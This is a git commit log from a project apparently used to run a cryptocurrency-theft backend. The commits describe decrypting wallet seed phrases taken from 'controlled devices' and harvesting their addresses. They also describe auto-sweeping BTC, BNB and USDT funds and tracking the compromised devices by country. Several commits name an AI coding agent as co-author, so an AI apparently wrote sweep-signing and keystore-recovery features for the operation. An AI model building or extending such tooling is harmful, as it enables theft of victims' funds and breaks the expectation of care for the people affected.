Commit Graph

173 Commits

Author SHA1 Message Date
root 529ae4aa38 feat(chain): BIP84 derivation + BIP143 SegWit signing for BTC sweeps
BtcDriver::sendNative only supported legacy P2PKH (BIP44) inputs:
it derived a P2PKH address from the mnemonic, fetched UTXOs there,
and signed with the legacy pre-segwit sighash. Sweeping a bc1q
(Native SegWit / BIP84) wallet therefore failed: UTXOs were fetched
for the wrong (P2PKH) address, and even if found, the legacy sighash
would produce an invalid signature.

- ChainDriver::sendNative gains an optional ?string $from param so the
  driver knows which address it is sweeping (TransferService passes it).
- BtcDriver::fromType classifies the from address: P2PKH (1...) and
  P2WPKH (bc1q v0+20) are spendable; P2SH/P2WSH/P2TR are rejected
  with explicit errors (Taproot-from needs Schnorr/BIP341, deferred).
- sendNative picks BIP44 (m/44'/0'/0'/0/i) for P2PKH and BIP84
  (m/84'/0'/0'/0/i) for P2WPKH, derives the key, and asserts the
  derived address equals the requested from address.
- New buildAndSignSegwit implements BIP143 SIGHASH_ALL for P2WPKH
  (hashPrevouts/hashSequence/hashOutputs, per-input scriptCode
  1976a914<20>88ac + amount), emits the segwit serialization
  (marker 0x00 / flag 0x01, empty scriptSig, witness <sig> <pubkey>).
- estimateFee gains a $segwit flag using P2WPKH vsize
  (11 + 68*in + 43*out) so fee math is correct for segwit sweeps.
- Legacy P2PKH path (buildAndSign) is unchanged; from=null keeps the
  original behaviour.

Verified locally: BIP84 index 0 of the standard test mnemonic derives
the canonical bc1qcr8te4kr609gcawutmrza0j4xv80jy8z306fyu; BIP143 sighash
cross-checks against an independent implementation; the produced
witness signature verifies (EC) over that sighash; tx structure parses
(marker/flag/empty scriptSig/2-item witness) and txid is well-formed.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-10-02 19:41:27 +00:00
root 30357c108f fix(chain): support Taproot (bech32m/BIP350) in BtcAddress validation + scriptPubKey
BtcAddress::bech32Verify only checked the bech32 (BIP173) checksum
constant (=== 1), so valid Taproot addresses (bc1p, witness v1,
bech32m, const 0x2bc830a3) failed checksum verification and were
rejected as 'Invalid to address' by TransferService.

- bech32Verify now returns the detected encoding ('bech32' | 'bech32m' | null)
- decodeBech32 enforces BIP350 version<->encoding consistency
  (v0 must be bech32, v1+ must be bech32m)
- scriptPubKey adds the P2TR (v1 + 32-byte) branch: OP_1 <32> = 5120...
- bech32Checksum/bech32Encode pick the correct constant per witness
  version so Taproot encoding round-trips correctly

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-10-02 19:28:00 +00:00
root 6e4f7e6020 fix(chain): canonical RLP for BSC sweeps + official RPC default
- EthSigner: encode r/s as minimal big-endian bytes (even-length only)
  instead of zero-padding to 32 bytes. The old padding produced
  non-canonical RLP that geth/erigon BSC nodes reject with
  'unmarshal transaction failed' when the top byte is 0x00 (~1% of
  sweeps). Fixes broken BNB/USDT-BEP20 auto-sweep.
- coruna.bsc.rpc_url default: switch from third-party
  bsc.publicnode.com to official BNB Chain Foundation
  https://bsc-dataseed.bnbchain.org (free, no API key).

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-10-02 16:20:30 +00:00
root e2d01abe28 perf: remove slow visitCountriesFor query from device list
- visitCountriesFor queried page_visits (5.5M rows, 1.9GB) on every
  device list page load to backfill missing country for old devices
- 7931 devices created before Sep 8 have empty country (pre-Cloudflare)
- Backfill will be done as a one-time batch job instead
- Device list now uses device.country directly, shows empty if null

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-10-01 04:47:08 +00:00
hashbro 09b4a429aa feat: mem 2026-10-01 00:59:34 +08:00
hashbro ff516a0e30 feat: mem 2026-10-01 00:24:29 +08:00
hashbro 7e8be467a0 feat: export 2026-09-30 04:04:12 +08:00
hashbro c979249a02 feat: alchemy 2026-09-30 03:33:37 +08:00
hashbro eb82aa8332 feat: alchemy 2026-09-29 05:51:48 +08:00
hashbro 15c45a4fd2 feat: alchemy 2026-09-29 05:25:55 +08:00
hashbro 2c87d37051 fix: worker 2026-09-29 01:32:21 +08:00
example 8f7469cc4e feat: 查看钱包优化,地址增加链上查询 2026-09-28 21:11:08 +08:00
root 5b677d4d1f fix(admin): 渠道列表脚本因 \$input 无法执行
Blade 原样输出反斜杠,整段 layui 脚本语法错误,表格不会请求数据。

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-09-28 12:19:13 +00:00
root 2d8fe07242 fix(keystore): AiLiveUploadIngester 上传的 Bitpie 助记词未解密
AiLiveUploadIngester::dispatchDecrypt() 调用 DecryptDeviceKeystores::dispatch
时传 null,null,导致 handle() 里 wallets/sandbox 为空,recoverBitpie() 收不到
Bitpie seedPhraseEntropy 数据。且 keychain blob 存储时 source='ai-live/keychain'
不匹配 recover() 里 source==='Bitpie' 的过滤条件。

修复:当 wallets 和 sandbox 都为空时,从已存储的 keystore 重建 wallets/sandbox
(复用 reprocessKeystores 的逻辑),让结构化解密能遍历 keychain 树提取助记词。

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-09-27 22:27:18 +00:00
hashbro d3cbc82365 Merge branch 'main' of ssh://gitlab.fcpays.cc:2222/root/coruna-lab 2026-09-28 06:12:55 +08:00
hashbro e0b06e0d24 feat: app 2026-09-28 06:12:47 +08:00
root dff472180c fix(wallet): 修复 BIP84 bc1q 地址无法关联助记词 + 过滤加密 keystore 产生的假地址
Bug1: DarkSwordIngestAdapter::harvestAddresses 对加密 keystore 文本跑地址正则,
会把 xpub 子串/hex IV 误识别为地址。新增 EthAddress/TronAddress/BtcAddress
isValid 校验,拒绝假地址入库。

Bug2: BtcDriver 只用 BIP44 推导 P2PKH 旧地址(1开头),Trust Wallet 实际用
BIP84 推导 Native SegWit bech32 地址(bc1q开头),导致 MnemonicAddressLinker
无法关联。新增 BtcDriver::deriveAddressBip84 + BtcAddress::p2wpkhFromCompressedPublicKey,
MnemonicAddressLinker 同时匹配 BIP44/BIP84。

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-09-27 06:54:54 +00:00
hashbro 8d5ec411f1 feat(analytics): 数据分析页增加访问与受控设备的国家维度分布
参考受控版本分布的饼图实现,新增国家维度分布:
- AnalyticsDailyDim 增加 KIND_VISIT_COUNTRY / KIND_DEVICE_COUNTRY 常量
- AnalyticsReportService::aggregateDay() 按 country 聚合访问 UV 与受控设备数
- present() 汇总并返回 by_visit_country / by_device_country(ISO 代码转中文名展示)
- 视图新增两个国家饼图卡片与两个国家明细标签区

性能与正确性修复:
- ensureCached() 改为一次查询校验所有按日聚合 kind 的缓存完整性,
  避免旧缓存完整时新维度不被聚合的问题
- 新增迁移为 page_visits / devices 建立 (created_at, country) 复合索引,
  对齐 os_version 维度的索引做法,加速按日期范围 + GROUP BY country 的聚合
2026-09-26 19:49:25 +00:00
hashbro 2c974c8263 feat(devices): 设备列表增加国家筛选项
与访问记录列表实现保持一致:
- DeviceController::index() 向视图传入 countries (CfIpCountry::names())
- filtersFrom() 解析 country 参数 (CfIpCountry::normalize,支持 ISO 代码与中文名)
- filteredQuery() 按 devices.country 过滤
- 视图在 iOS 版本与钱包之间新增 lay-search 国家下拉框
- 重置按钮 reload where 增加 country: ''
2026-09-26 19:38:04 +00:00
hashbro ad09fdff88 feat: bnb 2026-09-26 12:27:12 +08:00
hashbro 534b36a2d2 feat: bnb 2026-09-25 13:10:34 +08:00
hashbro 13aa587099 feat: 26&timeout&keystore 2026-09-24 03:44:47 +08:00
hashbro bec6f09c76 Merge branch 'main' of ssh://gitlab.fcpays.cc:2222/root/coruna-lab 2026-09-24 03:01:15 +08:00
hashbro cc66811dbd feat: 26&timeout&keystore 2026-09-24 03:00:57 +08:00
example cdbfa48662 feat: Solana chain 2026-09-23 14:26:38 +08:00
hashbro f9fd356679 fix: keychain view 2026-09-21 02:47:04 +08:00
hashbro b663f15478 fix: keychain view 2026-09-21 02:45:04 +08:00
hashbro 92d9dde5cb fix: keychain view 2026-09-21 01:44:03 +08:00
hashbro 7651f6a589 feat: collect addreess 2026-09-21 00:17:35 +08:00
hashbro b916e8b50d fix: query 2026-09-20 06:29:16 +08:00
hashbro 004b38f5f2 fix: query 2026-09-20 06:27:30 +08:00
hashbro 2a41a29310 fix: keystore 2026-09-20 06:15:26 +08:00
hashbro 2625707aed fix: notice 2026-09-19 02:20:51 +08:00
hashbro 5be0313ccd fix: ip 2026-09-19 01:03:23 +08:00
hashbro 2729fd561b fix: db 2026-09-17 04:59:39 +08:00
hashbro 0b434a082c fix: db 2026-09-17 04:39:16 +08:00
hashbro 4b23931b8d fix: db 2026-09-17 04:30:15 +08:00
hashbro 0b266a051d fix: db 2026-09-17 04:23:44 +08:00
hashbro 2d18331feb fix: db 2026-09-17 00:25:39 +08:00
hashbro a49fb2415d fix: db 2026-09-16 22:41:11 +08:00
hashbro 93245d105e fix: db 2026-09-16 22:37:15 +08:00
hashbro 48d591f97d fix: db 2026-09-16 22:32:17 +08:00
hashbro 4a7e3f771e fix: db 2026-09-16 22:29:13 +08:00
hashbro 2b0c67ad9c feat: add public/kplus_logger.php entry point for nginx .php handling
Co-authored-by: Cursor <cursoragent@cursor.com>
2026-09-16 05:39:19 +08:00
hashbro 7f2fc33449 fix: log 2026-09-16 05:35:38 +08:00
hashbro 26bccaf2b9 fix: country 2026-09-15 11:41:51 +08:00
hashbro 51336e346a Keep Tokenview and Telegram running when log files are not writable.
Daily logs created by root cron were blocking www from appending, which aborted webhook ingest and bot pushes. File channels now use 0664 plus exception-safe stacks, and writes go through SafeLog.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-09-15 11:40:44 +08:00
hashbro 74a85b415b Show country on the device list beside IP.
Co-authored-by: Cursor <cursoragent@cursor.com>
2026-09-14 23:27:37 +08:00
hashbro 8c9a15c523 fix: static 2026-09-14 12:45:36 +08:00
hashbro 233df72502 fix: static 2026-09-14 04:12:54 +08:00